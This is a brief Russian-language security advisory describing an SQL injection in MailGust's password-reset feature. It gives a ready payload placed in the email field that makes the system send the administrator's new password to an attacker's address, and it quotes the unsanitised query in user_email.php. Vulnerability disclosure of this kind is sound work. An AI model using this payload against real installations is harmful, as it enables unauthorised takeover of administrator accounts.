Если magic quotes отключен, то возможна SQL-инъекция. Не регистрируя аккаунт
в системе, можно выслать на e-mail новый пароль администратора:
[your_email],'or'a'='a'/* <at> hotmail.com
Уязвимое место в коде в файле [path_to_mailgust]/gorum/user_email.php в строке
363:
…
$query = «SELECT * FROM $applName»."_$userClassName «.
»WHERE email='$this->email'";
